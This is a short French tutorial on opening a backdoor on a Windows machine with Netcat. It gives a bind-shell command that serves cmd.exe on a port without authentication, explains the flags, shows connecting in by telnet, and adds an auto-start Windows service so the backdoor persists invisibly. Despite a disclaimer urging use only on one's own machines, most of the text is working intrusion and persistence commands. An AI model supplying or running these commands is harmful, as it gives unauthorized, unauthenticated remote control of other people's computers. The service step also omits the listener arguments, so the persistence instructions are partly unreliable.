Créer un accès distant sur une machine Windows

Netcat est un utilitaire réseau open-source s’utilisant en ligne de commande. Il permet de faire pas mal de choses, comme ouvrir des connexions réseau, scanner des ports, etc.

Ici, nous allons nous interesser à la création d’un backdoor, c’est à dire un accès à distance à une machine hôte. Le but de ce tutorial est d’apprendre, et certainement pas de s’amuser à hacker le PC du voisin. Utilisez seulement ces infos sur vos machines en ayant conscience du risque de sécurité encouru: En effet, une fois la manipulation effectuée, n’importe qui pourra se connecter en Telnet sans authentification sur la machine en question. Vous voilà prévenus

• La première chose à faire est bien sûr de télécharger Netcat pour Windows.
• Dézippez netcat dans le dossier %SYSTEMROOT%/System32
• Executez netcat. Dans la console, saisissez:

nc -d -L -e cmd.exe -p 10001

Voici ce qui se passe en executant cette commande:

• nc indique à windows d’éxecuter nc.exe avec les arguments suivants
• -d indique à netcat de ne pas lire sur l’entrée standard.
• -L indique à netcat de ne pas se fermer et d’attendre les connexions
• -e Tells what program to run once the port is connected to (cmd.exe)
• -p spécifie le port à utiliser

A partir de là, vous pouvez -à partir de n’importe quelle machine- vous connecter sur le poste Windows sur lequel nous avons effectué l’opération:

telnet X.X.X.X 10001

Bien entendu, X.X.X.X désigne l’adresse IP qui vous faut remplacer.

Maintenant, il faut savoir que dès que la machine hôte sera éteinte, netcat arrettera de tourner, et ne refonctionnera que si l’utilisateur relance le programme de lui-même.
Pour contrer celà, nous allons créer un service, qui est un programme tournant en arrière-plan de manière invisible.
Ouvrez la console d’administration Windows (Démarrer, Executer puis tapez cmd) et entrez la commande suivante:

sc create netcat binPath= c:\system32\netcat.exe start= auto

Désormais, Netcat tournera en arrière-plan dès l’ouverture de la session windows.